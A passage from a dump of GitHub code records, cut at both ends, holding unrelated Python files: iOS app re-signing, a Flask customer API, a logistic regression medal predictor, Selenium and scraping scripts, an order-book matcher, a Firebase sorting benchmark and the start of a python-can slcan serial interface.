    if 'Entitlements' not in plist_dict:\n            log.debug('failed to get entitlements in provisioning profile')\n            raise Exception('could not find Entitlements in {}'.format(provision_path))\n        return plist_dict['Entitlements']\n\n    def write_entitlements(self, entitlements):\n        \"\"\" Write entitlements to self.entitlements_path. This actually doesn't matter\n            to the app, it's just used later on by other parts of the signing process. \"\"\"\n        biplist.writePlist(entitlements, self.entitlements_path, binary=False)\n        log.debug(\"wrote Entitlements to {0}\".format(self.entitlements_path))\n\n    def resign(self, deep, signer, provisioning_profile, alternate_entitlements_path=None):\n        \"\"\" signs app in place \"\"\"\n\n        # TODO all this mucking about with entitlements feels wrong. The entitlements_path is\n        # not actually functional, it's just a way of passing it to later stages of signing.\n        # Maybe we should determine entitlements data in isign/archive.py or even isign/isign.py,\n        # and then embed it into Signer?\n\n        # In the typical case, we add entitlements from the pprof into the app's signature\n        if not signer.is_adhoc():\n            if alternate_entitlements_path is None:\n                # copy the provisioning profile in\n                self.provision(provisioning_profile)\n\n                entitlements = self.extract_entitlements(provisioning_profile)\n\n            else:\n                log.info(\"signing with alternative entitlements: {}\".format(alternate_entitlements_path))\n                entitlements = biplist.readPlist(alternate_entitlements_path)\n            self.write_entitlements(entitlements)\n\n        # actually resign this bundle now\n        super(App, self).resign(deep, signer)\n","repo_name":"sauce-archives/isign","sub_path":"isign/bundle.py","file_name":"bundle.py","file_ext":"py","file_size_in_byte":11147,"program_lang":"python","lang":"en","doc_type":"code","stars":753,"dataset":"github-code","pt":"86"}
+{"seq_id":"12960615924","text":"from flask import request\nfrom flask_restplus import Resource\n\nfrom ..util.dto import CustomerDto\nfrom ..util.decorator import crossdomain, token_required  # will be used later\nfrom ..service.customer_service import get_all_customers, get_a_customer, save_new_customer, update_customer\n\nfrom flask_cors import cross_origin\n\napi = CustomerDto.api\n_get_customer = CustomerDto.customer_get\n_post_customer = CustomerDto.customer_post\n_put_customer = CustomerDto.customer_put\n\n@api.route('/')\nclass CustomerList(Resource):\n    @api.doc('list_of_customers')\n    @crossdomain(origin='*')\n    def get(self):\n        \"\"\"List all customers\"\"\"\n        return get_all_customers()\n\n    @api.response(201, 'Customer successfully added.')\n    @api.doc('add a new customer')\n    @crossdomain(origin='*')\n    @api.expect(_post_customer, validate=True)\n    def post(self):\n        \"\"\"Creates a new customer \"\"\"\n        data = request.json\n        return save_new_customer(data=data)\n\n\n@api.route('/<id>')\n@api.param('id', 'The Customer id')\n@api.response(404, 'Customer not found.')\nclass Customer(Resource):\n    @api.doc('get a customer')\n    @crossdomain(origin='*')\n    @api.marshal_with(_get_customer)\n    def get(self, id):\n        \"\"\"get a customer given its id\"\"\"\n        customer = get_a_customer(id)\n        if not customer:\n            api.abort(404)\n        else:\n            return customer\n\n    @api.response(204, 'Successfully updated customer.')\n    @api.doc('update a customer')\n    @crossdomain(origin='*')\n    @api.expect(_put_customer, validate=True)\n    def put(self, id):\n        \"\"\"Updates a part \"\"\"\n        data = request.json\n        return update_customer(id, data=data)","repo_name":"Dieform-Automation/API","sub_path":"app/main/controller/customer_controller.py","file_name":"customer_controller.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"29172253313","text":"'''\nCredit to GitHub user Jaimin09\nLink: https://github.com/Jaimin09/Coding-Lane-Assets/tree/main/Logistic%20Regression%20in%20Python%20from%20Scratch\nLast accessed: 28/10/2021\n'''\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\nimport seaborn as sns\n\n\n# ! Functions that manipulate dataframes and csv files\n# * Reshapes X and Y files\ndef Reshape(X, Y):\n    # Define dataframes as variables\n    X = X.values\n    Y = Y.values\n    \n    # Reshape dataframes to appropriate shape\n    X = X.T\n    Y = Y.reshape(1, X.shape[1])\n    \n    return X, Y\n\n\n# * Make df even\ndef EvenDF(df, rng):\n    # Split dataframe into won a medal and didnt win a medal\n    df_1 = df[df.MedalEarned == 1]\n    df_0 = df[df.MedalEarned == 0]\n    \n    # Randomly sample df_0 to size of df_1\n    df_0 = df_0.sample(n = len(df_1), random_state=rng.integers(100000))\n    \n    return df_1, df_0\n\n\n# * Make df_test (X_test and Y_test)\ndef TestSampler(df, rng, X_list, Y_list):\n    # Split dataframe into won a medal and didnt win a medal\n    df_1 = df[df.MedalEarned == 1]\n    df_0 = df[df.MedalEarned == 0]\n    \n    # Randomly sample test df_1 and df_0\n    df_1_test = df_1.sample(n = 100, random_state=rng.integers(100000))\n    df_0_test = df_0.sample(n = 100, random_state=rng.integers(100000))\n    \n    # Remove test samples from df_1 and df_0\n    df = df.drop(df_1_test.index)\n    df_testless = df.drop(df_0_test.index)\n    \n    # Concat df_1_test and df_0_test\n    df_test_list = [df_1_test, df_0_test]\n    df_test = pd.concat(df_test_list)\n    \n    # Reduce and split X and Y dataframes\n    X_test = df_test[X_list]\n    Y_test = df_test[Y_list]\n    \n    return df_testless, X_test, Y_test\n\n\n# * Make the X and Y data frames\ndef TrainValidate(df, X_list, Y_list, rng):\n    # Randomly sample df_0 to size of df_1\n    df_1, df_0 = EvenDF(df, rng)\n    \n    # Randomly sample validate df_1 and df_0\n    df_1_validate = df_1.sample(frac= 0.2, random_state=rng.integers(100000))\n    df_0_validate = df_0.sample(frac= 0.2, random_state=rng.integers(100000))\n    \n    # Remove validation samples from df_1 and df_0\n    # The rest of df_1 and df_0 are training\n    df_1_train = df_1.drop(df_1_validate.index)\n    df_0_train = df_0.drop(df_0_validate.index)\n    \n    # concatinate training and validation\n    df_validate_list = [df_1_validate, df_0_validate]\n    df_train_list = [df_1_train, df_0_train]\n    \n    df_validate = pd.concat(df_validate_list)\n    df_train = pd.concat(df_train_list)\n    \n    # Reduce and split X and Y dataframes\n    X_validate = df_validate[X_list]\n    Y_validate = df_validate[Y_list]\n    X_train = df_train[X_list]\n    Y_train = df_train[Y_list]\n    \n    return X_train, Y_train, X_validate, Y_validate\n\n\n# ! The functions for the logistic regression model\n# * Sigmoid function\ndef Sigmoid(x):\n    return 1/(1 + np.exp(-x))\n\n\n# * The model\ndef Model(X, Y, l_rate, iterations):\n    m = X.shape[1] # Observations\n    n = X.shape[0] # Types of parameters\n    \n    W = np.zeros((n,1)) # All a parameters\n    B = 0\n    \n    cost_list = [] # Empty cost list\n    \n    for i in range(iterations):\n        lf = np.dot(W.T, X) + B # Linear function\n        sf = Sigmoid(lf) # Sigmoid function\n        \n        # Cost function\n        cost = -(1/m)*np.sum( Y*np.log(sf) + (1-Y)*np.log(1-sf))\n        \n        # Gradient Descent\n        dW = (1/m)*np.dot(sf-Y, X.T)\n        dB = (1/m)*np.sum(sf - Y)\n        \n        W = W - l_rate * dW.T\n        B = B - l_rate * dB\n        \n        # Keeping track of our cost function value\n        cost_list.append(cost)\n    \n    return W, B, cost_list\n\n\n# ! The functions that run the model\n# * Run model\ndef RunModel(df, rng, cop, iterations, l_rate, X_list, Y_list):\n    # Make X_train, Y_train, X_validate, Y_validate\n    X_train, Y_train, X_validate, Y_validate = TrainValidate(df, X_list, Y_list, rng)\n    \n    # Import and reshape training and validation dataframes\n    X_train, Y_train = Reshape(X_train, Y_train)\n    X_validate, Y_validate = Reshape(X_validate, Y_validate)\n    \n    # Call Model function\n    W, B, cost_list = Model(X_train, Y_train, l_rate, iterations)\n    \n    val_sf = Classify(X_validate, W, B, cop)\n    val_acc, val_occ = Accuracy(val_sf, Y_validate)\n    \n    return W, B, val_acc, val_occ\n\n\n# * Classify winners and losers\ndef Classify(X, W, B, cop):\n    lf = np.dot(W.T, X) + B # Linear function\n    sf = Sigmoid(lf) # Sigmoid function\n    \n    # Make sf binary array with data type int64\n    sf = sf > cop # Sets sf to one if > 0 or 0 if < 0\n    sf = np.array(sf, dtype = 'int64')\n    \n    return sf\n\n\n# * Calculate accuracy of the model\ndef Accuracy(sf, Y):\n    # 1 = True Pos, 0 = True Neg, -1 = False Neg, 2 = False Pos \n    predictions = sf * 2 - Y\n    occurance = [[x, list(predictions[0]).count(x)] for x in set(list(predictions[0]))]\n    occ_d = {1:0, 0:0, -1:0, 2:0}\n    \n    # Assign value to keys e.g. TP : 22\n    for i in occurance: \n        occ_d[i[0]] = i[1]\n    \n    # True Positive, True Negative, False Positive and False Negative\n    tp, tn, fp, fn = occ_d[1], occ_d[0], occ_d[2], occ_d[-1]\n    \n    # Calculate accuracy\n    acc = (tp + tn) / (tp + tn + fp + fn)\n    \n    return acc, occ_d\n\n\n# * Print accuracy\ndef PrintAccReport(acc_lists, occ_lists):\n    avg_acc_column = []\n    min_acc_column = []\n    max_acc_column = []\n    tpr_column = []\n    fpr_column = []\n    fdr_column = []\n    ppv_column = []\n    \n    for i, acc_list in enumerate(acc_lists):\n        # Calculate average, min and max accuracy\n        acc_avg = round(sum(acc_list) / len(acc_list)*100, 2)\n        acc_min = round(min(acc_list)*100, 2)\n        acc_max = round(max(acc_list)*100, 2)\n        \n        avg_acc_column.append(f'{acc_avg} %')\n        min_acc_column.append(f'{acc_min} %')\n        max_acc_column.append(f'{acc_max} %')\n    \n    # Calculate the True Positive Rate and False Positive Rate\n    for i, occ_list in enumerate(occ_lists):\n        tpr,fpr,fdr,ppv = TPFP(occ_list)\n        tpr_column.append(format(tpr, \".2f\"))\n        fpr_column.append(format(fpr, \".2f\"))\n        fdr_column.append(format(fdr, \".2f\"))\n        ppv_column.append(format(ppv, \".2f\"))\n    \n    report = pd.DataFrame({\n        'Avg. Acc.' : avg_acc_column,\n        'Min. Acc.': min_acc_column,\n        'Max. Acc.': max_acc_column,\n        'TPR': tpr_column,\n        'FPR': fpr_column,\n        'FDR': fdr_column,\n        'PPV': ppv_column\n        },\n        index= ['Validate', 'Test', 'Decathlon'])\n    \n    fig, ax = plt.subplots()\n    ax.axis('off')\n    ax.axis('tight')\n    t= ax.table(cellText=report[['Avg. Acc.', 'Min. Acc.', 'Max. Acc.', 'TPR', 'FPR', 'FDR', 'PPV']].head( n=7).values,\n            colColours = ['royalblue']*7,\n            rowLabels=report.index ,colLabels=report.columns,  loc='center')\n    \n    t.auto_set_font_size(False) \n    t.set_fontsize(8)\n    fig.tight_layout()\n    \n    for i in range(7):\n        cell = t[0,i]\n        cell.get_text().set_color('white')\n    \n    for (row, col), cell in t.get_celld().items():\n        if (row == 0) or (col == 7):\n            cell.set_text_props(fontproperties=FontProperties(weight = 'bold'))\n    \n    plt.show()\n\n\n# * Run multiple iterations of the model\ndef RunMore(df, X_list, Y_list, rng, cop, times, iterations, l_rate, save_par= False):\n    W_list = []\n    B_list = []\n    val_acc_list = []\n    val_occ_list = []\n    \n    # Create test sample\n    df_testless, X_test, Y_test = TestSampler(df, rng, X_list, Y_list)\n    \n    for i in range(times):\n        # Run model\n        W, B, val_acc, val_occ = RunModel(df_testless, rng, cop, iterations, l_rate, X_list, Y_list)\n        \n        # Append parameters, accuracy and occurances to lists\n        W_list.append(W)\n        B_list.append(B)\n        val_acc_list.append(val_acc)\n        val_occ_list.append(val_occ)\n        \n        # Progress bar\n        if len(W_list) % 10 == 0:\n            print(f'{times - len(W_list)} runs left.')\n    \n    X_test, Y_test = Reshape(X_test, Y_test)\n    test_occ_list = []\n    test_acc_list = []\n    \n    # Test parameters on test data\n    for i in range(len(W_list)):\n        test_sf = Classify(X_test, W_list[i], B_list[i], cop)\n        test_acc, test_occ = Accuracy(test_sf, Y_test)\n        test_acc_list.append(test_acc)\n        test_occ_list.append(test_occ)\n    \n    W_array = np.concatenate(W_list, axis=1)\n    B_array = np.stack(B_list)\n    \n    if save_par:\n        np.savetxt('W.csv', W_array, delimiter= ',')\n        np.savetxt('B.csv', B_array, delimiter= ',')\n    \n    return val_acc_list, test_acc_list, W_array, B_array, val_occ_list, test_occ_list\n\n\n# ! Run parameters on decathlon athletes\ndef Decathlon(df, X_list, Y_list, W_array, B_array, cop):\n    dec_acc_list = []\n    dec_occ_list = []\n    \n    # Reduce and split X and Y dataframes\n    X_dec = df[X_list]\n    Y_dec = df[Y_list]\n    \n    # Import and reshape dec data\n    X_dec, Y_dec = Reshape(X_dec, Y_dec)\n    \n    # Test parameters on dec\n    for i in range(len(W_array[0])):\n        W_par = np.array([W_array[0][i], W_array[1][i], W_array[2][i]], ndmin= 0)\n        dec_sf = Classify(X_dec, W_par, B_array[i], cop)\n        dec_acc, dec_occ = Accuracy(dec_sf, Y_dec)\n        dec_acc_list.append(dec_acc)\n        dec_occ_list.append(dec_occ)\n    \n    return dec_acc_list, dec_occ_list\n\n\n# ! Calculate True Positive and False Positive\ndef TPFP(occ_l= []):\n    tp,fp,tn,fn = 0,0,0,0 \n    \n    # Sum up all occurances of False negatives and positives\n    # 1 = True Pos, 0 = True Neg, -1 = False Neg, 2 = False Pos \n    for i, occ in enumerate(occ_l):\n        tp += occ[1]\n        tn += occ[0]\n        fn += occ[-1]\n        fp += occ[2]\n    \n    # True positive rate - sensitivity \n    tpr = tp / (tp + fn)\n    # False Positive - type 1 error\n    fpr = fp / (fp + tn)\n    # False Discovery Rate\n    fdr = fp / (tp + fp)\n    # Positive Predictive Value\n    ppv = tp / (tp + fp)\n    \n    return tpr, fpr, fdr, ppv\n\n# ! Plot confusion matrix\ndef Confusion(acc, occ, times = 50, data_title = ''):\n    tp,fp,tn,fn = 0,0,0,0\n    \n    # Sum up all occurances of False negatives and positives\n    # 1 = True Pos, 0 = True Neg, -1 = False Neg, 2 = False Pos \n    for i in range(times):\n        tp += occ[i][1]\n        tn += occ[i][0]\n        fn += occ[i][-1]\n        fp += occ[i][2]\n    \n    # True positive rate - sensitivity \n    tpr = tp / (tp + fn)\n    # False Positive - type 1 error\n    fpr = fp / (fp + tn)\n    \n    print(f'True positive rate: {round(tpr*100, 2)}')\n    print(f'False positive rate: {round(fpr*100, 2)}')\n    \n    cm = [[tn, fp],\n          [fn, tp]]\n    \n    plt.figure(figsize=(5,5))\n    sns.heatmap(cm, annot=True, fmt=\".0f\", square = True)\n    plt.ylabel('Actual outcome')\n    plt.xlabel('Predicted outcome')\n    plt.title(data_title)\n    plt.show()\n\n\n# ! Run the model\nif __name__ == '__main__':\n    filepath = 'Datasets/Datasets_we_dont_need/dec_sep_MPHWA.csv'\n    df = pd.read_csv(filepath)\n    df= df.reset_index()\n    \n    dec_path = 'Datasets/Datasets_we_dont_need/dec_MPHWA.csv'\n    dec_df = pd.read_csv(dec_path)\n    dec_df = dec_df.reset_index()\n    \n    X_list = ['Height', 'Weight', 'Age']\n    Y_list = ['MedalEarned']\n    \n    rng = np.random.default_rng(12345)\n    \n    val_acc_list, test_acc_list, W_array, B_array, val_occ_list, test_occ_dic_list = RunMore(df, X_list, Y_list, rng, cop = 0.50, times= 50, iterations= 5000, l_rate= 0.00015)\n    \n    dec_acc_list, dec_occ_list = Decathlon(dec_df, X_list, Y_list, W_array, B_array, cop= 0.50)\n    \n    list_of_acc_lists = [val_acc_list, test_acc_list, dec_acc_list]\n    PrintAccReport([val_acc_list, test_acc_list, dec_acc_list], [val_occ_list,test_occ_dic_list,dec_occ_list])\n    \n    \n    Confusion(sum(val_acc_list)/len(val_acc_list),val_occ_list, data_title = 'Validation Matrix')\n    Confusion(sum(test_acc_list)/len(test_acc_list),test_occ_dic_list, data_title = 'Test Matrix')\n    Confusion(sum(dec_acc_list)/len(dec_acc_list),dec_occ_list, data_title = 'Decathlon Matrix')\n","repo_name":"MrKahr/P1-dataanalyse","sub_path":"logistic_regression/v1_model.py","file_name":"v1_model.py","file_ext":"py","file_size_in_byte":12161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"8492824622","text":"from selenium.webdriver.common.by import By\n\nfrom test_feishu_selinum.page.remove_group_page import RemoveGroupPage\n\n\nclass CreateGroupPage:\n    def __init__(self, driver):\n        self.driver = driver\n\n    def create_group(self,name):\n        self.driver.find_element(By.XPATH, \"//*[@class = 'chat-name-input']\").send_keys(name)\n        self.driver.find_element(By.XPATH,\n                                 \"//*[@class = 'larkc-btn larkc-btn-normal larkc-btn-primary larkc-btn-large']\").click()\n        return RemoveGroupPage(self.driver)\n","repo_name":"landoflaughs/test_feishu","sub_path":"test_feishu_selinum/page/create_group_page.py","file_name":"create_group_page.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"23319179152","text":"print('  Calculando sequência  ')\r\nprint('--------------------------')\r\nprint('somente números acima \"5\"')\r\nn = int(input('Valor de n: '))\r\nprint('[0] - Calcular soma sequêncial')\r\nprint('[1] - Subtrair pares e somar grupos')\r\nprint('[2] - Calcular soma sequencial de dois em dois')\r\nopcao = int(input('Escolha a opção: '))\r\ns, sb, sq = 0, 0, 0\r\nif opcao == 0:\r\n    for c in range(1, n+1):\r\n        sq = sq + c\r\nelif opcao == 1:\r\n    for c in range(1, n):\r\n        if c % 2 == 0 and c < 5:\r\n            sb = c * (-1)\r\n            s = s + sb\r\n        elif c % 1 == 0:\r\n            s = s + c\r\n        if c <= n:\r\n            sq = s + ((2*n)-1)\r\nelif opcao == 2:\r\n    for c in range(1, n, 2):\r\n        s = s + c\r\n        if c <= n:\r\n            sq = s + ((2*n)-1)\r\nprint(f'Resultado da opção {opcao} é igual a {sq}')\r\n","repo_name":"Odnerb/Python","sub_path":"calculando_sequencias.py","file_name":"calculando_sequencias.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"28000828253","text":"from bisect import *\r\n\r\nclass OrderBooks:\r\n    def __init__(self):\r\n        self.books = {}\r\n    \r\n    def addorder(self, l, t):\r\n        l.insert(bisect_right(l, t), t)\r\n\r\n\r\n    def matchorders(self, book):\r\n        buys = self.books[book][0]\r\n        sells = self.books[book][1]\r\n        r = len(buys) - 1\r\n        l = 0\r\n        while r >= 0 and l < len(sells):\r\n            if buys[r][0] <= sells[l][0]:\r\n                if buys[r][1] < sells[l][1]:\r\n                    sells[l][2] -= buys[r][2]\r\n                    # buys.pop()\r\n                    r -= 1\r\n                elif buys[r][1] > sells[l][1]:\r\n                    buys[r][2] -= sells[l][2]\r\n                    # sells.remove()\r\n                    l += 1\r\n                else:\r\n                    l += 1\r\n                    r -= 1\r\n            else:\r\n                break\r\n        self.books[book][0] = self.books[book][0][:r+1]\r\n        self.books[book][1] = self.books[book][1][l:]\r\n\r\n\r\n    def add_order(self, book, operation, price, volume, order_id):\r\n        if book not in self.books:\r\n            self.books[book] = [[], []]\r\n        \r\n        operation = 1 if operation == \"SELL\" else 0\r\n\r\n\r\n        self.addorder(self.books[book][operation], (price, volume, order_id))\r\n        self.matchorders(book)\r\n\r\n    def delete_order(self, book, orderid):\r\n        if book not in self.books:\r\n            return\r\n        buys = self.books[book][0]\r\n        sells = self.books[book][1]\r\n        idx = -1\r\n        for i in range(len(buys)):\r\n            a, b, c = buys[i]\r\n            if c == orderid:\r\n                idx = i\r\n        if idx != -1:\r\n            buys.pop(idx)\r\n\r\n        \r\n        idx = -1\r\n        for i in range(len(sells)):\r\n            a, b, c = sells[i]\r\n            if c == orderid:\r\n                idx = i\r\n        if idx != -1:\r\n            sells.pop(idx)\r\n\r\n    def readXML(self, filepath):\r\n        #Read the XML file and process each line using the above functions\r\n        pass\r\n\r\n\r\n","repo_name":"HrishikeshAmbekar/AuroDigitalTest","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"29070679028","text":"from bs4 import BeautifulSoup\nimport requests\n\nif __name__ == '__main__':\n    url=\"http://bokjiro.go.kr/welInfo/retrieveWelInfoBoxList.do\"\n    data = {\"searchIntClId\":\"01\",\"pageUnit\":\"300\"}\n    with requests.post(url,data) as response:\n        soup = BeautifulSoup(response.text,\"lxml\")\n\n    # print(soup)\n    # 아이돌봄서비스\n    # dts = soup.find_all(\"dt\",attrs={\"class\":\"tit\"})\n    # for dt in dts:\n    #     title=dt.find(\"a\")\n    #     print(title.text)\n\n    # 위에 긴걸 아래 짧게 쓸 수 있음\n    n=1\n    titles = soup.select(\"dt.tit > a\") # text\n    for title in titles:\n        print(n,title.text)\n        n+=1","repo_name":"Wonchaeyeon/Programming-Python-","sub_path":"2학기/IX.프로젝트/web_crawoling_복지로.py","file_name":"web_crawoling_복지로.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"6249805670","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May  3 16:56:05 2019\n\n@author: lpmatos\n\nimport pyrebase\n\nconfig = {\n  \"apiKey\": \"apiKey\",\n  \"authDomain\": \"gumplus-9d995.firebaseapp.com\",\n  \"databaseURL\": \"https://gumplus-9d995.firebaseio.com\",\n  \"storageBucket\": \"gumplus-9d995.appspot.com\"\n}\n\nfirebase = pyrebase.initialize_app(config)\n\n\"\"\"\n\nfrom firebase import firebase\nimport json\nfrom ordenacao import merge, bubble, insert, selection, quick, gnome, heap, comb, shell, otherquick\nimport timeit\n\nfirebase = firebase.FirebaseApplication('https://gumplus-9d995.firebaseio.com', None)\nresult = firebase.get('.', None)\nparsed_json = json.dumps(result, sort_keys=False, indent=4)\n\nlista = [elemento for elemento in result.items() if elemento[0] == 'Profissional']\n\nlista = lista[0][1]\n\nfiltro = []\n\nprint()\n\nfor profissional in range(len(lista)):\n    pegando = lista[profissional]\n    if('Nota' not in pegando):\n        continue\n    endereco = pegando['Endereco']\n    nome = pegando['Nome']\n    nota = pegando['Nota']\n    filtro.append([nome, nota, endereco])\n    \nfor elemento in range(len(filtro)):\n    pegando = filtro[elemento]\n    print(pegando)\n    \nfiltro_1 = filtro.copy()\nfiltro_2 = filtro.copy()\nfiltro_3 = filtro.copy()\nfiltro_4 = filtro.copy()\nfiltro_5 = filtro.copy()\nfiltro_6 = filtro.copy()\nfiltro_7 = filtro.copy()\nfiltro_8 = filtro.copy()\nfiltro_9 = filtro.copy()\nfiltro_10 = filtro.copy()\n\nprint()\n\ndef arredondar(num):\n    return float('%.20g'%( num))\n\nlista_tempo = []\n\ninicio = timeit.default_timer()\nordenado_1 = bubble.bubbleSort(filtro_1)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Bubble: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_2 = merge.mergeSort(filtro_2)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Merge: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_3 = selection.selectionSort(filtro_3)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Selection: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_4 = quick.quickSort(filtro_4, 0, len(filtro_4) - 1)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Quick: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_5 = insert.insertionSort(filtro_5)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Insertion: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_6 = gnome.gnomeSort(filtro_6)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Gnome: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_7 = heap.heapSort(filtro_7)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Heap: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_8 = comb.combSort(filtro_8)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Comb: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_9 = shell.shellSort(filtro_9)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Shell: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_10 = otherquick.quick(filtro_10, 0, len(filtro_10))\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Other: %f' % (duracao))\n\nprint()\nprint('Menor:', min(lista_tempo))\nprint('Maior:', max(lista_tempo))\n\nlista = [{\"Nome\":filtro_4[elemento][0], \"Nota\":filtro_4[elemento][1], \"Endereco\":filtro_4[elemento][2]} \n          for elemento in range(len(filtro_4))]\n\nprint(lista)\n\ndicionario = {\"Profissional\":lista}\n\n\nprint()\nprint(len(result))\nprint()\nprint(result[\"Profissional\"])\nresult[\"Profissional\"] = lista\nprint()\nprint(len(result[\"Profissional\"]))\nprint()\nprint(result[\"Profissional\"])\nprint()\nprint(len(result[\"Profissional\"]))\n\nprint(result)\n\nparsed_json = json.dumps(result[\"Profissional\"], sort_keys=False, indent=4)\n\nprint(parsed_json)\n\npost = firebase.put('.', '/Profissional', result[\"Profissional\"])\nprint(post)\nprint()\nprint(lista_tempo)\n\nalgoritmos = [elemento for elemento in range(1, 10)]\nprint(algoritmos)\n\n\nfrom matplotlib import pyplot as plt\n\nnomes = (\"Bubble\", \"Merge\", \"Selection\", \"Quick\", \"Insertion\", \"Gnome\", \"Heap\", \"Comb\", \"Shell\", \"Other\")\n\nplt.figure(0, figsize=(15, 6))\nplt.bar(nomes, lista_tempo, width = 0.7, bottom = 0, linewidth = 2.0, align = 'center')\nplt.title('Elementos ordenados')\nplt.xlabel('Algoritmos', fontsize = 15)\nplt.ylabel('Tempo de Execução', fontsize = 15)\nplt.savefig('Figura_2.pdf') \n\n\n","repo_name":"thiagosantanap/Projeto-PI","sub_path":"Backend/conexao.py","file_name":"conexao.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"}
+{"seq_id":"38843349380","text":"# coding: utf-8\n\n\"\"\"\nInterface for slcan compatible interfaces (win32/linux).\n\n.. note::\n\n    Linux users can use slcand or socketcan as well.\n\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport time\nimport logging\n\nfrom can import BusABC, Message\n\nlogger = logging.getLogger(__name__)\n\ntry:\n    import serial\nexcept ImportError:\n    logger.warning(\"You won't be able to use the slcan can backend without \"\n                   \"the serial module installed!\")\n    serial = None\n\n\nclass slcanBus(BusABC):\n    \"\"\"\n    slcan interface\n    \"\"\"\n\n    # the supported bitrates and their commands\n    _BITRATES = {\n        10000: 'S0',\n        20000: 'S1',\n        50000: 'S2',\n        100000: 'S3',\n        125000: 'S4',\n        250000: 'S5',\n        500000: 'S6',\n        750000: 'S7',\n        1000000: 'S8',\n        83300: 'S9'\n    }\n\n    _SLEEP_AFTER_SERIAL_OPEN = 2  # in seconds\n\n    LINE_TERMINATOR = b'\\r'\n\n    def __init__(self, channel, ttyBaudrate=115200, bitrate=None,\n                 btr=None, sleep_after_open=_SLEEP_AFTER_SERIAL_OPEN,\n                 rtscts=False, **kwargs):\n        \"\"\"\n        :raise ValueError: if both *bitrate* and *btr* are set\n\n        :param str channel:\n            port of underlying serial or usb device (e.g. /dev/ttyUSB0, COM8, ...)\n            Must not be empty.\n        :param int ttyBaudrate:\n            baudrate of underlying serial or usb device\n        :param int bitrate:\n            Bitrate in bit/s\n        :param str btr:\n            BTR register value to set custom can speed\n        :param float poll_interval:\n            Poll interval in seconds when reading messages\n        :param float sleep_after_open:\n            Time to wait in seconds after opening serial connection\n        :param bool rtscts:\n            turn hardware handshake (RTS/CTS) on and off\n        \"\"\"\n\n        if not channel:  # if None or empty\n            raise TypeError(\"Must specify a serial port.\")\n\n        if '@' in channel:\n            (channel, ttyBaudrate) = channel.split('@')\n\n        self.serialPortOrig = serial.serial_for_url(\n            channel, baudrate=ttyBaudrate, rtscts=rtscts)\n\n        self._buffer = bytearray()\n\n        time.sleep(sleep_after_open)\n\n        if bitrate is not None and btr is not None:\n            raise ValueError(\"Bitrate and btr mutually exclusive.\")\n\n        if bitrate is not None:\n            self.close()\n            if bitrate in self._BITRATES:\n                self.write(self._BITRATES[bitrate])\n            else:\n                raise ValueError(\"Invalid bitrate, choose one of \" + (', '.join(self._BITRATES)) + '.')\n\n        if btr is not None:\n            self.close()\n            self.write(\"s\" + btr)\n\n        self.open()\n\n        super(slcanBus, self).__init__(channel, ttyBaudrate=115200,\n                                       bitrate=None, rtscts=False, **kwargs)\n\n    def write(self, string):\n        self.serialPortOrig.write(string.encode() + self.LINE_TERMINATOR)\n        self.serialPortOrig.flush()\n\n    def open(self):\n        self.write('O')\n\n    def close(self):\n        self.write('C')\n\n    def _recv_internal(self, timeout):\n        if timeout != self.serialPortOrig.timeout:\n            self.serialPortOrig.timeout = timeout\n\n        canId = None\n        remote = False\n        extended = False\n        frame = []\n\n        # First read what is already in the receive buffer\n        while (self.serialPortOrig.in_waiting and\n               self.LINE_TERMINATOR not in self._buffer):\n            self._buffer += self.serialPortOrig.read(1)\n\n        # If we still don't have a complete message, do a blocking read\n        if self.LINE_TERMINATOR not in self._buffer:\n            self._buffer += self.serialPortOrig.read_until(self.LINE_TERMINATOR)\n\n        if self.LINE_TERMINATOR not in self._buffer:\n            # Timed out\n            return None, False\n\n        readStr = self._buffer.decode()\n        del self._buffer[:]\n        if not readStr:\n            pass\n        elif readStr[0] == 'T':\n            # extended frame\n            canId = int(readStr[1:9], 16)\n            dlc = int(readStr[9])\n            extended = True\n            for i in range(0, dlc):\n                frame.append(int(readStr[10 + i * 2:12 